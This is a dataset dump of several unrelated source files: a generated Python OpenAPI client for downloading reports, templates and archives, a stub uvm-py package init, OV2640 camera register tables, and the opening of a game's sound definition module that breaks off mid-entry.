ApiTypeError( "Got an unexpected keyword argument '%s'" " to method download_get_exports" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'archive_name' is set if self.api_client.client_side_validation and ('archive_name' not in local_var_params or # noqa: E501 local_var_params['archive_name'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `archive_name` when calling `download_get_exports`") # noqa: E501 collection_formats = {} path_params = {} if 'archive_name' in local_var_params: path_params['archiveName'] = local_var_params['archive_name'] # noqa: E501 query_params = [] if 'ids' in local_var_params and local_var_params['ids'] is not None: # noqa: E501 query_params.append(('ids', local_var_params['ids'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/zip', 'application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey', 'JWT'] # noqa: E501 response_types_map = { 200: "file", 400: "ProblemDetails", 402: "ProblemDetails", 403: "ProblemDetails", 404: "ProblemDetails", } return self.api_client.call_api( '/download/es/{archiveName}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def download_get_report(self, id, **kwargs): # noqa: E501 """Returns a prepared file with specified id # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_report(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: file """ kwargs['_return_http_data_only'] = True return self.download_get_report_with_http_info(id, **kwargs) # noqa: E501 def download_get_report_with_http_info(self, id, **kwargs): # noqa: E501 """Returns a prepared file with specified id # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_report_with_http_info(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(file, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method download_get_report" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `download_get_report`") # noqa: E501 if self.api_client.client_side_validation and 'id' in local_var_params and not re.search(r'^[A-Fa-f0-9]{24}$', local_var_params['id']): # noqa: E501 raise ApiValueError("Invalid value for parameter `id` when calling `download_get_report`, must conform to the pattern `/^[A-Fa-f0-9]{24}$/`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/octet-stream', 'application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey', 'JWT'] # noqa: E501 response_types_map = { 200: "file", 404: "ProblemDetails", 400: "ProblemDetails", 402: "ProblemDetails", 403: "ProblemDetails", } return self.api_client.call_api( '/download/r/{id}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def download_get_report_thumbnail(self, id, **kwargs): # noqa: E501 """Returns report's thumbnail # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_report_thumbnail(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: file """ kwargs['_return_http_data_only'] = True return self.download_get_report_thumbnail_with_http_info(id, **kwargs) # noqa: E501 def download_get_report_thumbnail_with_http_info(self, id, **kwargs): # noqa: E501 """Returns report's thumbnail # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_report_thumbnail_with_http_info(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(file, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method download_get_report_thumbnail" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `download_get_report_thumbnail`") # noqa: E501 if self.api_client.client_side_validation and 'id' in local_var_params and not re.search(r'^[A-Fa-f0-9]{24}$', local_var_params['id']): # noqa: E501 raise ApiValueError("Invalid value for parameter `id` when calling `download_get_report_thumbnail`, must conform to the pattern `/^[A-Fa-f0-9]{24}$/`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['image/png', 'image/jpeg', 'application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey', 'JWT'] # noqa: E501 response_types_map = { 200: "file", 404: "ProblemDetails", 400: "ProblemDetails", 402: "ProblemDetails", 403: "ProblemDetails", } return self.api_client.call_api( '/download/r/{id}/thumbnail', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def download_get_reports(self, archive_name, **kwargs): # noqa: E501 """Returns a zip archive with selected files # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_reports(archive_name, async_req=True) >>> result = thread.get() :param archive_name: name of the created archive (required) :type archive_name: str :param ids: ids separated with a ',' sign :type ids: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: file """ kwargs['_return_http_data_only'] = True return self.download_get_reports_with_http_info(archive_name, **kwargs) # noqa: E501 def download_get_reports_with_http_info(self, archive_name, **kwargs): # noqa: E501 """Returns a zip archive with selected files # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_reports_with_http_info(archive_name, async_req=True) >>> result = thread.get() :param archive_name: name of the created archive (required) :type archive_name: str :param ids: ids separated with a ',' sign :type ids: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(file, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'archive_name', 'ids' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method download_get_reports" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'archive_name' is set if self.api_client.client_side_validation and ('archive_name' not in local_var_params or # noqa: E501 local_var_params['archive_name'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `archive_name` when calling `download_get_reports`") # noqa: E501 collection_formats = {} path_params = {} if 'archive_name' in local_var_params: path_params['archiveName'] = local_var_params['archive_name'] # noqa: E501 query_params = [] if 'ids' in local_var_params and local_var_params['ids'] is not None: # noqa: E501 query_params.append(('ids', local_var_params['ids'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/zip', 'application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey', 'JWT'] # noqa: E501 response_types_map = { 200: "file", 404: "ProblemDetails", 400: "ProblemDetails", 402: "ProblemDetails", 403: "ProblemDetails", } return self.api_client.call_api( '/download/rs/{archiveName}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def download_get_template(self, id, **kwargs): # noqa: E501 """Returns a Template file with specified id # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_template(id, async_req=True) >>> result = thread.get() :param id: template id (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: file """ kwargs['_return_http_data_only'] = True return self.download_get_template_with_http_info(id, **kwargs) # noqa: E501 def download_get_template_with_http_info(self, id, **kwargs): # noqa: E501 """Returns a Template file with specified id # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_template_with_http_info(id, async_req=True) >>> result = thread.get() :param id: template id (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(file, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method download_get_template" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `download_get_template`") # noqa: E501 if self.api_client.client_side_validation and 'id' in local_var_params and not re.search(r'^[A-Fa-f0-9]{24}$', local_var_params['id']): # noqa: E501 raise ApiValueError("Invalid value for parameter `id` when calling `download_get_template`, must conform to the pattern `/^[A-Fa-f0-9]{24}$/`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/octet-stream', 'application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey', 'JWT'] # noqa: E501 response_types_map = { 200: "file", 404: "ProblemDetails", 400: "ProblemDetails", 402: "ProblemDetails", 403: "ProblemDetails", } return self.api_client.call_api( '/download/t/{id}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def download_get_template_thumbnail(self, id, **kwargs): # noqa: E501 """Returns template's thumbnail # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_template_thumbnail(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: file """ kwargs['_return_http_data_only'] = True return self.download_get_template_thumbnail_with_http_info(id, **kwargs) # noqa: E501 def download_get_template_thumbnail_with_http_info(self, id, **kwargs): # noqa: E501 """Returns template's thumbnail # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_template_thumbnail_with_http_info(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(file, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method download_get_template_thumbnail" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `download_get_template_thumbnail`") # noqa: E501 if self.api_client.client_side_validation and 'id' in local_var_params and not re.search(r'^[A-Fa-f0-9]{24}$', local_var_params['id']): # noqa: E501 raise ApiValueError("Invalid value for parameter `id` when calling `download_get_template_thumbnail`, must conform to the pattern `/^[A-Fa-f0-9]{24}$/`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['image/png', 'image/jpeg', 'application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey', 'JWT'] # noqa: E501 response_types_map = { 200: "file", 404: "ProblemDetails", 400: "ProblemDetails", 402: "ProblemDetails", 403: "ProblemDetails", } return self.api_client.call_api( '/download/t/{id}/thumbnail', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def download_get_templates(self, archive_name, **kwargs): # noqa: E501 """Returns a zip archive with selected files # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_templates(archive_name, async_req=True) >>> result = thread.get() :param archive_name: name of the created archive (required) :type archive_name: str :param ids: ids separated with a ',' sign :type ids: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: file """ kwargs['_return_http_data_only'] = True return self.download_get_templates_with_http_info(archive_name, **kwargs) # noqa: E501 def download_get_templates_with_http_info(self, archive_name, **kwargs): # noqa: E501 """Returns a zip archive with selected files # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_templates_with_http_info(archive_name, async_req=True) >>> result = thread.get() :param archive_name: name of the created archive (required) :type archive_name: str :param ids: ids separated with a ',' sign :type ids: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(file, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'archive_name', 'ids' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method download_get_templates" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'archive_name' is set if self.api_client.client_side_validation and ('archive_name' not in local_var_params or # noqa: E501 local_var_params['archive_name'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `archive_name` when calling `download_get_templates`") # noqa: E501 collection_formats = {} path_params = {} if 'archive_name' in local_var_params: path_params['archiveName'] = local_var_params['archive_name'] # noqa: E501 query_params = [] if 'ids' in local_var_params and local_var_params['ids'] is not None: # noqa: E501 query_params.append(('ids', local_var_params['ids'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/zip', 'application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey', 'JWT'] # noqa: E501 response_types_map = { 200: "file", 400: "ProblemDetails", 402: "ProblemDetails", 403: "ProblemDetails", 404: "ProblemDetails", } return self.api_client.call_api( '/download/ts/{archiveName}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth'))

43.797101

179

0.586105

6,370

57,418

5.029827

0.036735

0.0397

0.06161

0.030337

0.976623

0.976373

0.975655

0.974813

0.972004

0

0.01573

0.337908

57,418

1,310

180

43.830534

0.827073

0.446898

0

0.781457

1

0.009934

0.197936

0.052999

0

1

0.031457

false

0

0.008278

0

0.071192

0

null

0

1

0

1

0

null

0

8

2b4fba63e5241094d29de5d93a89bf34f79f0132

185

py

Python

src/uvm/base/__init__.py

fvutils/uvm-py

5e5ed203b680ead6e1b47fcff6d74fa99b5929c4

[ "Apache-2.0" ]

1

2019-10-13T06:14:28.000Z

src/uvm/base/__init__.py

fvutils/uvm-py

5e5ed203b680ead6e1b47fcff6d74fa99b5929c4

[ "Apache-2.0" ]

null

src/uvm/base/__init__.py

fvutils/uvm-py

5e5ed203b680ead6e1b47fcff6d74fa99b5929c4

[ "Apache-2.0" ]

1

2019-12-23T06:21:49.000Z

# from uvm.base.component import * # from uvm.base.coreservice import * # from uvm.base.globals import * # from uvm.base.report_object import * # from uvm.base.object_globals import *

26.428571

39

0.751351

27

185

5.074074

0.333333

0.255474

0.40146

0.49635

0

0.140541

185

6

40

30.833333

0.861635

0.935135

0

null

0

null

0

null

0

null

1

null

true

0

null

1

0

null

1

0

1

0

1

0

null

0

1

0

7

2b740a85d6a042bfb93569bf50b05be7bde76692

3,165

py

Python

ov2640_hires_constants.py

FunPythonEC/OV2640_uPy

2c2e4bf006e3cdcc4eed4ff105404205463a8c3c

[ "MIT" ]

6

2019-05-13T13:48:18.000Z

2021-12-28T19:08:34.000Z

ov2640_hires_constants.py

FunPythonEC/OV2640_uPy

2c2e4bf006e3cdcc4eed4ff105404205463a8c3c

[ "MIT" ]

1

2019-07-13T08:51:08.000Z

2020-05-26T01:54:36.000Z

ov2640_hires_constants.py

FunPythonEC/OV2640_uPy

2c2e4bf006e3cdcc4eed4ff105404205463a8c3c

[ "MIT" ]

4

2019-05-04T07:51:47.000Z

2021-01-21T21:46:45.000Z

OV2640_1024x768_JPEG = [ [0xff, b'\x01'], [0x11, b'\x01'], [0x12, b'\x00'], [0x17, b'\x11'], [0x18, b'\x75'], [0x32, b'\x36'], [0x19, b'\x01'], [0x1a, b'\x97'], [0x03, b'\x0f'], [0x37, b'\x40'], [0x4f, b'\xbb'], [0x50, b'\x9c'], [0x5a, b'\x57'], [0x6d, b'\x80'], [0x3d, b'\x34'], [0x39, b'\x02'], [0x35, b'\x88'], [0x22, b'\x0a'], [0x37, b'\x40'], [0x34, b'\xa0'], [0x06, b'\x02'], [0x0d, b'\xb7'], [0x0e, b'\x01'], [0xff, b'\x00'], [0xc0, b'\xC8'], [0xc1, b'\x96'], [0x8c, b'\x00'], [0x86, b'\x3D'], [0x50, b'\x00'], [0x51, b'\x90'], [0x52, b'\x2C'], [0x53, b'\x00'], [0x54, b'\x00'], [0x55, b'\x88'], [0x5a, b'\x00'], [0x5b, b'\xC0'], [0x5c, b'\x01'], [0xd3, b'\x02'], [0xff, b'\xff'] ] OV2640_1280x1024_JPEG = [ [0xff, b'\x01'], [0x11, b'\x01'], [0x12, b'\x00'], [0x17, b'\x11'], [0x18, b'\x75'], [0x32, b'\x36'], [0x19, b'\x01'], [0x1a, b'\x97'], [0x03, b'\x0f'], [0x37, b'\x40'], [0x4f, b'\xbb'], [0x50, b'\x9c'], [0x5a, b'\x57'], [0x6d, b'\x80'], [0x3d, b'\x34'], [0x39, b'\x02'], [0x35, b'\x88'], [0x22, b'\x0a'], [0x37, b'\x40'], [0x34, b'\xa0'], [0x06, b'\x02'], [0x0d, b'\xb7'], [0x0e, b'\x01'], [0xff, b'\x00'], [0xe0, b'\x04'], [0xc0, b'\xc8'], [0xc1, b'\x96'], [0x86, b'\x3d'], [0x50, b'\x00'], [0x51, b'\x90'], [0x52, b'\x2c'], [0x53, b'\x00'], [0x54, b'\x00'], [0x55, b'\x88'], [0x57, b'\x00'], [0x5a, b'\x40'], [0x5b, b'\xf0'], [0x5c, b'\x01'], [0xd3, b'\x02'], [0xe0, b'\x00'], [0xff, b'\xff'] ] OV2640_1600x1200_JPEG = [ [0xff, b'\x01'], [0x11, b'\x01'], [0x12, b'\x00'], [0x17, b'\x11'], [0x18, b'\x75'], [0x32, b'\x36'], [0x19, b'\x01'], [0x1a, b'\x97'], [0x03, b'\x0f'], [0x37, b'\x40'], [0x4f, b'\xbb'], [0x50, b'\x9c'], [0x5a, b'\x57'], [0x6d, b'\x80'], [0x3d, b'\x34'], [0x39, b'\x02'], [0x35, b'\x88'], [0x22, b'\x0a'], [0x37, b'\x40'], [0x34, b'\xa0'], [0x06, b'\x02'], [0x0d, b'\xb7'], [0x0e, b'\x01'], [0xff, b'\x00'], [0xe0, b'\x04'], [0xc0, b'\xc8'], [0xc1, b'\x96'], [0x86, b'\x3d'], [0x50, b'\x00'], [0x51, b'\x90'], [0x52, b'\x2c'], [0x53, b'\x00'], [0x54, b'\x00'], [0x55, b'\x88'], [0x57, b'\x00'], [0x5a, b'\x90'], [0x5b, b'\x2C'], [0x5c, b'\x05'], [0xd3, b'\x02'], [0xe0, b'\x00'], [0xff, b'\xff'] ]

24.160305

56

0.325434

372

3,165

2.752688

0.188172

0.082031

0.046875

0.035156

0.896484

0.857422

0.810547

0

0.286245

0.405055

3,165

130

57

24.346154

0.257568

0

0.866142

0

0.152971

0

0.152971

0

1

0

false

0

null

0

1

0

1

0

1

0

1

0

null

0

9

5129f69001933dd8569b5150c11f82ef6fee8d3a

184,310

py

Python

src/module_sounds.py

faycalki/medieval-conquests

113e13e2b166b79517c14f2c13f7561307a89f75

[ "MIT" ]

7

2019-08-11T14:20:20.000Z

2021-11-21T06:48:24.000Z

src/module_sounds.py

faycalki/medieval-conquests

113e13e2b166b79517c14f2c13f7561307a89f75

[ "MIT" ]

null

src/module_sounds.py

faycalki/medieval-conquests

113e13e2b166b79517c14f2c13f7561307a89f75

[ "MIT" ]

null

from header_sounds import * sounds = [ ("click", sf_2d|sf_vol_1,["click_01.wav"]), ("tutorial_1", sf_2d|sf_vol_7,["tutorial_1.ogg"]), ("tutorial_2", sf_2d|sf_vol_7,["tutorial_2.ogg"]), ("gong", sf_2d|sf_priority_9|sf_vol_9, ["cymbal_01.wav"]), ("quest_taken", sf_2d|sf_priority_9|sf_vol_10, ["get_quest_01.wav"]), ("quest_completed", sf_2d|sf_priority_9|sf_vol_7, ["quest_completed.ogg"]), ("quest_succeeded", sf_2d|sf_priority_9|sf_vol_7, ["quest_succeeded.ogg"]), ("quest_concluded", sf_2d|sf_priority_9|sf_vol_7, ["quest_concluded.ogg"]), ("quest_failed", sf_2d|sf_priority_9|sf_vol_7, ["quest_failed.ogg"]), ("quest_cancelled", sf_2d|sf_priority_9|sf_vol_7, ["quest_cancelled.ogg"]), # ("rain",sf_2d|sf_priority_10|sf_vol_13|sf_looping, ["rain_1.ogg"]), #Old ("rain",sf_2d|sf_priority_10|sf_vol_13|sf_looping, ["rain_1.ogg", "rain_medium_01R.wav", "rain_medium_01L.wav", "rain_light_01R.wav", "rain_heavy_01R.wav", "rain_heavy_01L.wav", "rain_hail_02R.wav", "rain_hail_02L.wav","rain_hail_01R.wav","rain_hail_01L.wav"]), ("money_received",sf_2d|sf_priority_10|sf_vol_6, ["coins_dropped_1.ogg"]), ("money_paid",sf_2d|sf_priority_10|sf_vol_10, ["coins_dropped_2.ogg"]), ("sword_clash_1", sf_priority_5|sf_vol_9,["sword_clank_metal_09.ogg","sword_clank_metal_09b.ogg","sword_clank_metal_10.ogg","sword_clank_metal_10b.ogg","sword_clank_metal_12.ogg","sword_clank_metal_12b.ogg","sword_clank_metal_13.ogg","sword_clank_metal_13b.ogg"]), ("sword_clash_2", sf_priority_5|sf_vol_9,["sword_clank_metal_09.ogg"]), ("sword_clash_3", sf_priority_5|sf_vol_9,["sword_clank_metal_12.ogg"]), ("sword_swing", 